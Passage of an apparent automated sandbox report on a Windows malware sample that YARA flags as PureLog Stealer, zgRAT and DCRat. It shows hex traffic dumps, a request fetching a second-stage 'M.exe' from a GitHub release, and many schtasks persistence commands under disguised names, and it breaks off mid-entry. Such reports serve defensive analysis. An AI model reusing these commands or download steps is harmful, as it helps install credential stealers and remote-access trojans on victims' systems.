ff 15 90 30 Data Ascii: ++PhPVV,Y4F++Sh5CVZVe,3jXfLFE^VQP-E]}E(DEEEEEu}EEPt<0FD0Fu,@0F=0u3fEPt<0FD0F_^[U,EVP0
2024-12-10 06:32:52 UTC	1378	IN	Data Raw: 8d 8e 10 56 00 00 e8 2c ff ff ff 8d 8e c0 32 00 00 e8 21 ff ff ff 8d 8e f8 20 00 00 e8 fc b7 00 00 8d 8e 38 10 00 00 e8 12 48 00 00 8b ce 5e e9 a2 7e 00 00 81 c1 28 10 00 00 e9 f8 fe ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b f1 e8 7a ff ff ff f6 44 24 08 01 74 0d 68 18 7d 00 00 56 e8 3e d4 01 00 59 59 8b c6 5e c2 04 00 56 8b f1 8b 4c 24 08 03 4e 04 89 4e 04 3b 4e 08 0f 86 9d 00 00 00 8b 46 0c 53 55 bd 98 10 44 00 57 85 c0 74 1a 3b c8 76 16 50 68 18 36 43 00 55 e8 cf 54 00 00 83 c4 0c 8b cd e8 36 55 00 00 8b 46 08 8b 5e 04 c1 e8 02 83 c0 20 03 46 08 3b d8 77 02 8b d8 80 7e 10 00 53 74 3a e8 a1 26 02 00 8b f8 59 85 ff 75 07 8b cd e8 07 55 00 00 83 3e 00 74 38 ff 76 08 ff 36 57 e8 70 eb 01 00 83 c4 0c ff 76 08 ff 36 e8 88 dc 00 00 ff 36 e8 6a 26 02 Data Ascii: V,2! 8H^~(VzD$th}V>YY^VL$NN;NFSUDWt;vPh6CUT6UF^ F;w~St:&YuU>t8v6Wpv66j&
2024-12-10 06:32:52 UTC	1378	IN	Data Raw: 00 00 8b 83 f4 21 00 00 83 f8 01 0f 84 da 00 00 00 80 bb f8 21 00 00 00 74 09 83 f8 04 0f 84 c8 00 00 00 8b cb e8 dd 1e 00 00 85 c0 0f 95 45 f2 85 c0 75 c7 8a 45 f3 8a 8b dd 6c 00 00 84 c9 74 0a 80 7d 08 00 0f 84 2f ff ff ff 80 bb dc 6c 00 00 00 75 04 84 c0 75 19 84 c9 75 0b 8d 43 32 50 6a 1b e8 fe f6 ff ff 80 7d 08 00 0f 84 09 ff ff ff 80 7d f2 00 8a 83 3c 22 00 00 88 83 ce 6c 00 00 0f 84 14 01 00 00 80 bb f8 21 00 00 00 74 0d 80 bb d4 6c 00 00 00 0f 85 fe 00 00 00 83 7b 10 01 0f 84 f4 00 00 00 8b 03 8b 70 14 8b ce ff 15 78 32 43 00 8b cb ff d6 8b f0 8b fa 8b 83 b8 6c 00 00 89 45 e8 8b 83 bc 6c 00 00 89 45 ec 8b 83 c0 6c 00 00 89 45 e4 8b 83 c4 6c 00 00 89 45 e0 8b 83 f4 21 00 00 89 45 dc eb 43 b0 01 e9 45 ff ff ff 8b 83 f4 21 00 00 83 f8 03 75 20 80 bb Data Ascii: !!tEuElt}/luuuC2Pj}}<"l!tl{px2ClElElElE!ECE!u
2024-12-10 06:32:52 UTC	1378	IN	Data Raw: 68 00 08 00 00 56 e8 48 97 00 00 eb ca 8b ca 83 fa 3a 75 08 6a 5f 58 66 89 06 eb 18 8b c1 83 f9 2f 74 0e 66 3b c3 75 0c 83 bf c8 6c 00 00 03 74 03 66 89 1e 83 c6 02 0f b7 06 8b c8 66 85 c0 75 a4 5b 5f 5e c2 04 00 56 8b f1 57 8b be d8 6c 00 00 03 be 18 22 00 00 83 be c8 6c 00 00 02 8b 8e 2c 22 00 00 74 10 51 8b ce e8 8d f7 ff ff 8b 8e 6c 22 00 00 03 c8 33 d2 03 cf 5f 13 d2 8b c1 5e c3 8a 81 89 33 00 00 c3 b8 ac 20 00 00 e8 36 ca 01 00 57 8b bc 24 b4 20 00 00 89 4c 24 10 8b 47 18 2b 84 24 b8 20 00 00 3b 47 1c 0f 82 28 06 00 00 83 bc 24 b8 20 00 00 02 89 47 1c 0f 82 17 06 00 00 53 8b 9c 24 c0 20 00 00 55 56 8b cf e8 a0 aa 00 00 8b c8 85 d2 0f 8c f9 05 00 00 7f 08 85 c9 0f 84 ef 05 00 00 8b 47 18 8b 77 1c 2b c6 0f 84 e1 05 00 00 85 d2 0f 8f d9 05 00 00 7c 08 Data Ascii: hVH:uj_Xf/tf;ultffu[_^VWl"l,"tQl"3_^3 6W$ L$G+$ ;G($ GS$ UVGw+\|
2024-12-10 06:32:52 UTC	1378	IN	Data Raw: 00 50 e9 bc fc ff ff 8b cf e8 03 a6 00 00 85 c0 74 2c 50 68 94 36 43 00 8d 44 24 34 6a 14 50 e8 84 19 00 00 8b 4c 24 2c 8d 44 24 3c 83 c4 10 50 8d 43 28 50 e8 1a 19 00 00 e9 21 01 00 00 8b cf e8 cc a5 00 00 8a c8 d1 e8 80 e1 01 24 01 88 8b c1 10 00 00 8b cf 88 83 ca 10 00 00 e8 64 a4 00 00 0f b6 c0 89 83 ec 10 00 00 83 f8 18 76 27 50 68 9c 36 43 00 8d 44 24 34 6a 14 50 e8 27 19 00 00 8b 4c 24 2c 8d 44 24 3c 83 c4 10 50 8d 43 28 50 e8 bd 18 00 00 6a 10 8d 83 a1 10 00 00 8b cf 50 e8 cd a4 00 00 6a 10 8d 83 b1 10 00 00 8b cf 50 e8 bd a4 00 00 80 bb c1 10 00 00 00 0f 84 84 00 00 00 6a 08 8d b3 c2 10 00 00 8b cf 56 e8 a0 a4 00 00 6a 04 8d 44 24 2c 8b cf 50 e8 92 a4 00 00 8d 44 24 54 50 e8 41 d8 00 00 6a 08 56 8d 44 24 5c 50 e8 7a d8 00 00 8d 44 24 2c 50 8d 44 Data Ascii: Pt,Ph6CD$4jPL$,D$<PC(P!$dv'Ph6CD$4jP'L$,D$<PC(PjPjPjVjD$,PD$TPAjVD$\PzD$,PD
2024-12-10 06:32:52 UTC	1378	IN	Data Raw: 00 00 0f b6 c8 89 4e 1c 8d 4d 1c e8 53 9f 00 00 2c 30 8d 4d 1c 88 46 20 e8 5d 9f 00 00 0f b7 c8 89 4d 50 8d 4d 1c e8 84 9f 00 00 8b 56 1c 89 45 48 89 46 24 83 fa 14 73 0b a8 10 74 07 c6 86 f1 10 00 00 01 33 c9 89 8e 9c 10 00 00 38 8e 9b 10 00 00 74 43 83 ea 0d 74 34 4a 83 ea 01 74 22 83 ea 05 74 11 83 ea 06 74 0c c7 86 9c 10 00 00 04 00 00 00 eb 22 c7 86 9c 10 00 00 03 00 00 00 eb 16 c7 86 9c 10 00 00 02 00 00 00 eb 0a c7 86 9c 10 00 00 01 00 00 00 8a 46 18 c7 86 fc 10 00 00 02 00 00 00 3c 03 74 10 3c 05 74 0c 3c 06 73 12 89 8e fc 10 00 00 eb 0a c7 86 fc 10 00 00 01 00 00 00 89 8e 00 11 00 00 3c 03 75 22 8b 45 48 25 00 f0 00 00 3d 00 a0 00 00 75 13 33 c0 c7 86 00 11 00 00 01 00 00 00 66 89 86 04 11 00 00 83 ff 02 74 07 b0 01 39 4e 24 7c 02 8a c1 88 86 f8 Data Ascii: NMS,0MF ]MPMVEHF$st38tCt4Jt"tt"F<t<t<s<u"EH%=u3ft9N$\|
2024-12-10 06:32:52 UTC	1378	IN	Data Raw: 6c 00 00 8b 8b 28 22 00 00 8b c1 c1 e8 02 24 01 88 83 cf 6c 00 00 8b c1 c1 e8 06 24 01 88 83 d3 6c 00 00 8b c1 c1 e8 07 24 01 88 83 d4 6c 00 00 85 d2 75 0b 33 c0 66 39 83 34 22 00 00 74 02 b0 01 88 83 d0 6c 00 00 8b c1 d1 e8 24 01 88 83 3c 22 00 00 8b c1 c1 e8 08 24 01 c1 e9 04 80 e1 01 88 83 d1 6c 00 00 88 8b d2 6c 00 00 6a 07 5f 6a 00 8d 4d 1c e8 85 9a 00 00 0f b7 c0 39 83 fc 21 00 00 0f 84 9e 00 00 00 8b 83 00 22 00 00 83 f8 79 0f 84 8f 00 00 00 83 f8 76 0f 84 86 00 00 00 83 f8 05 75 53 80 bb c6 45 00 00 00 74 4a 8b 03 8b 70 14 8b ce ff 15 78 32 43 00 8b cb ff d6 8b 33 33 c9 2b c7 51 1b d1 8b 4e 10 52 50 ff 15 78 32 43 00 8b cb ff 56 10 c6 45 5b 01 8b cb e8 01 66 00 00 f6 d8 1a c0 f6 d0 22 45 5b 88 45 5b 83 ef 01 75 e8 84 c0 75 2e 6a 03 b9 98 10 44 00 Data Ascii: l("$l$l$lu3f94"tl$<"$llj_jM9!"yvuSEtJpx2C33+QNRPx2CVE[f"E[E[uu.jD
2024-12-10 06:32:52 UTC	1378	IN	Data Raw: b0 6a 10 8d 83 7c 22 00 00 50 8d 4d 30 e8 3b 95 00 00 80 bb 74 22 00 00 00 74 5f 6a 08 8d b3 8c 22 00 00 56 8d 4d 30 e8 21 95 00 00 6a 04 8d 45 64 50 8d 4d 30 e8 13 95 00 00 8d 45 8c 50 e8 c3 c8 00 00 6a 08 56 8d 45 8c 50 e8 fd c8 00 00 8d 45 08 50 8d 45 8c 50 e8 c7 c7 00 00 6a 04 8d 45 08 50 8d 45 64 50 e8 cf d4 01 00 83 c4 0c f7 d8 1a c0 fe c0 88 83 74 22 00 00 c6 83 d4 6c 00 00 01 e9 6b 03 00 00 33 c0 83 fa 02 6a 00 0f 94 c0 8d 78 ff 81 e7 50 23 00 00 81 c7 98 22 00 00 03 fb 8b cf 89 7d 2c e8 09 75 00 00 6a 05 59 8d b3 fc 21 00 00 f3 a5 8b 83 00 22 00 00 8d 4d 30 8b 75 2c 89 45 64 8b 45 60 89 86 58 10 00 00 8b 45 5c c6 86 f9 10 00 00 01 89 86 5c 10 00 00 e8 08 95 00 00 8d 4d 30 89 86 94 10 00 00 e8 fa 94 00 00 89 86 60 10 00 00 8b 86 94 10 00 00 c1 e8 Data Ascii: j\|"PM0;t"t_j"VM0!jEdPM0EPjVEPEPEPjEPEdPt"lk3jxP#"},ujY!"M0u,EdE`XE\\M0`
2024-12-10 06:32:52 UTC	1378	IN	Data Raw: 7d 08 39 5d 0c 75 53 39 9e 4c 56 00 00 7c 1e 7f 0c 81 be 48 56 00 00 00 00 00 01 76 10 8d 46 32 50 6a 1e e8 f1 d6 ff ff e9 a1 01 00 00 85 ff 75 09 c6 86 29 21 00 00 01 eb 20 ff b6 48 56 00 00 8b cf e8 04 e4 ff ff ff b6 48 56 00 00 8d 8e f8 20 00 00 ff 37 e8 ea 93 00 00 38 9e 83 56 00 00 74 5a 8b 96 d4 21 00 00 38 9a 24 61 00 00 0f 84 5a 01 00 00 8d 86 aa 56 00 00 50 8d 8e b3 56 00 00 51 ff b6 d4 56 00 00 0f b6 8e 88 56 00 00 8d 86 99 56 00 00 50 f7 d9 8d 86 89 56 00 00 1b c9 23 c8 8d 82 24 60 00 00 51 50 ff b6 84 56 00 00 8d 8e f8 20 00 00 53 e8 23 93 00 00 6a 01 ff b6 58 56 00 00 8d 8e b8 21 00 00 e8 d9 6d 00 00 8b 8e 44 56 00 00 ff 75 0c 8b 86 40 56 00 00 89 8e 24 21 00 00 89 8e 1c 21 00 00 8d 8e f8 20 00 00 56 89 86 20 21 00 00 89 86 18 21 00 00 88 9e Data Ascii: }9]uS9LV\|HVvF2Pju)! HVHV 78VtZ!8$aZVPVQVVVPV#$`QPV S#jXV!mDVu@V$!! V !!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49720	20.233.83.145	443	4656	C:\Users\user\Desktop\Dfim58cp4J.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 06:32:58 UTC	85	OUT	GET /GGGamessamp/fewfwe/releases/download/ZigZag/M.exe HTTP/1.1 Host: github.com
2024-12-10 06:32:59 UTC	952	IN	HTTP/1.1 302 Found Server: GitHub.com Date: Tue, 10 Dec 2024 06:32:59 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/868158503/16b63538-1c52-423d-a1dc-6a47e429a59c?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241210%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241210T063259Z&X-Amz-Expires=300&X-Amz-Signature=79a9b5ca397255641f5410c4563cccc1c45f04bec8ea2ea257f01e537e4de219&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3DM.exe&response-content-type=application%2Foctet-stream Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade
2024-12-10 06:32:59 UTC	3379	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co

Target ID:	1
Start time:	01:32:46
Start date:	10/12/2024
Path:	C:\Users\user\Desktop\Dfim58cp4J.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Dfim58cp4J.exe"
Imagebase:	0x820000
File size:	359'936 bytes
MD5 hash:	1430AF130A1E5556185AA87E6D8D933F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000000.1312124353.0000000000822000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	01:32:55
Start date:	10/12/2024
Path:	C:\Users\user\AppData\Local\Temp\DC.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\DC.exe"
Imagebase:	0xbd0000
File size:	2'351'929 bytes
MD5 hash:	8E9E5B8DC57C1A495271A7C764BC9520
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000003.1412722099.0000000005587000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000003.1412248106.0000000005570000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\DC.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\DC.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\DC.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\DC.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	01:32:56
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\ServerfontSessiondhcpcommon\eaCU8Ys0bTHhRgAXuIP2K2y8ZFscnTNFvzEdLnUp1L90rgZK9PR.vbe"
Imagebase:	0xc20000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:12:54
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\ServerfontSessiondhcpcommon\rRsN24KgvF8tfDCZTHbc8YaYPrEwJMoOvgbTdRUF.bat" "
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	03:12:54
Start date:	10/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	03:12:54
Start date:	10/12/2024
Path:	C:\ServerfontSessiondhcpcommon\comReviewsvc.exe
Wow64 process (32bit):	false
Commandline:	"C:\ServerfontSessiondhcpcommon/comReviewsvc.exe"
Imagebase:	0xf30000
File size:	2'030'080 bytes
MD5 hash:	53D61BC60C85CB1647B5556C4225FB86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000000.1654892379.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000008.00000002.1687630200.00000000133DB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 88%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	03:12:56
Start date:	10/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\windowspowershell\Modules\PackageManagement\1.0.0.1\services.exe'" /f
Imagebase:	0x7ff7e34c0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	03:12:56
Start date:	10/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\windowspowershell\Modules\PackageManagement\1.0.0.1\services.exe'" /rl HIGHEST /f
Imagebase:	0x7ff7e34c0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	03:12:56
Start date:	10/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\windowspowershell\Modules\PackageManagement\1.0.0.1\services.exe'" /rl HIGHEST /f
Imagebase:	0x7ff7e34c0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	03:12:56
Start date:	10/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "HHfZjsufdvzxFpnqfrPtJXXoIspuxAH" /sc MINUTE /mo 7 /tr "'C:\ServerfontSessiondhcpcommon\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe'" /f
Imagebase:	0x7ff7e34c0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	03:12:56
Start date:	10/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "HHfZjsufdvzxFpnqfrPtJXXoIspuxA" /sc ONLOGON /tr "'C:\ServerfontSessiondhcpcommon\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe'" /rl HIGHEST /f
Imagebase:	0x7ff7e34c0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	03:12:56
Start date:	10/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "HHfZjsufdvzxFpnqfrPtJXXoIspuxAH" /sc MINUTE /mo 5 /tr "'C:\ServerfontSessiondhcpcommon\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe'" /rl HIGHEST /f
Imagebase:	0x7ff7e34c0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	03:12:56
Start date:	10/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 6 /tr "'C:\ServerfontSessiondhcpcommon\ApplicationFrameHost.exe'" /f
Imagebase:	0x7ff7e34c0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	03:12:56
Start date:	10/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ApplicationFrameHost" /sc ONLOGON /tr "'C:\ServerfontSessiondhcpcommon\ApplicationFrameHost.exe'" /rl HIGHEST /f
Imagebase:	0x7ff7e34c0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	03:12:56
Start date:	10/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 9 /tr "'C:\ServerfontSessiondhcpcommon\ApplicationFrameHost.exe'" /rl HIGHEST /f
Imagebase:	0x7ff7e34c0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	03:12:56
Start date:	10/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 5 /tr "'C:\ServerfontSessiondhcpcommon\System.exe'" /f
Imagebase:	0x7ff7e34c0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	03:12:56
Start date:	10/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\ServerfontSessiondhcpcommon\System.exe'" /rl HIGHEST /f
Imagebase:	0x7ff7e34c0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	03:12:57
Start date:	10/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\ServerfontSessiondhcpcommon\System.exe'" /rl HIGHEST /f
Imagebase:	0x7ff75da10000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	03:12:57
Start date:	10/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "HHfZjsufdvzxFpnqfrPtJXXoIspuxAH" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe'" /f
Imagebase:	0x7ff7e34c0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	03:12:57
Start date:	10/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "HHfZjsufdvzxFpnqfrPtJXXoIspuxA" /sc ONLOGON /tr "'C:\Program Files (x86)\java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe'" /rl HIGHEST /f
Imagebase:	0x7ff7e34c0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	03:12:57
Start date:	10/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "HHfZjsufdvzxFpnqfrPtJXXoIspuxAH" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe'" /rl HIGHEST /f
Imagebase:	0x7ff7e34c0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	03:12:57
Start date:	10/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jlgss9VamV.bat"
Imagebase:	0x7ff70d2b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	03:12:57
Start date:	10/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	03:12:57
Start date:	10/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff7fc300000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	03:12:57
Start date:	10/12/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff7f5cf0000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	03:12:57
Start date:	10/12/2024
Path:	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe"
Imagebase:	0xe50000
